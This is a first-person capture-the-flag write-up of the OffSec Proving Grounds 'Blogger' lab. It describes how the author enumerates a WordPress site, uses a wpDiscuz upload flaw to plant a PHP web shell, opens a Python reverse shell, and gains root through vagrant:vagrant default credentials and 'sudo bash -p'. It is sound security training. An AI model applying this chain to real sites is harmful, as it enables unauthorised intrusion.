Blogger - OffSec Proving Grounds
Objective
Utilize enumeration and web enumeration techniques to uncover vulnerabilities. Engage in privilege escalation by abusing sudo permissions to gain elevated access. This lab is designed to harness your skills in identifying and exploiting system weaknesses.
Enumeration
Nmap
Initial Nmap enumeration revealed open SSH and HTTP ports.
WEB Enumeration
While analyzing the website structure, I came across a blog page that was unexpectedly placed under the /assets/fonts/ folder.
The blog page turned out to be a WordPress installation, but it was only accessible via the blogger.pg domain. To access it locally, I added an entry for blogger.pg to my /etc/hosts file.
Wordpress Enumeration
I then attempted user enumeration and brute-forcing against the WordPress login. While I was able to identify valid usernames, the brute-force attack did not yield any working credentials.
Using aggressive plugin detection, I identified a vulnerable plugin “wpDiscuz” installed on the WordPress site.
Exploitation
The vulnerability in the wpDiscuz plugin affects the blog post comment section, allowing attackers to upload PHP files disguised as image files by using GIF magic numbers. I leveraged this by using a publicly available script that uploads a PHP web shell as a comment attachment to any chosen blog post.
The initial web shell uploaded via the vulnerable comment section was non-responsive. To gain a more stable shell, I executed a Python reverse shell from within it, which successfully established a fully interactive connection back to my listener.
Privilege Escalation
Once inside the system, I located database credentials in the wp-config.php file. Using these, I accessed the MySQL database and found a hashed password belonging to the user james. However, despite several attempts, I was unable to crack the hash.
I then discovered a backup script listed in the crontab jobs, which used the tar * command-suggesting a potential for wildcard-based privilege escalation. However, upon further inspection, I realized that the script was executed in a directory where I lacked write permissions, making the exploit path unfeasible.
Later, I found a .creds file under the /opt directory, which appeared to contain encrypted credentials. However, I was unable to decrypt the file, so this path did not lead to privilege escalation either.
While exploring the system, I noticed a vagrant user listed in /etc/passwd and confirmed the presence of their home directory. I tried the default credentials vagrant:vagrant, which successfully granted access. Running sudo -l revealed that the vagrant user had passwordless sudo privileges. I then executed sudo bash -p to escalate privileges and obtained a root shell.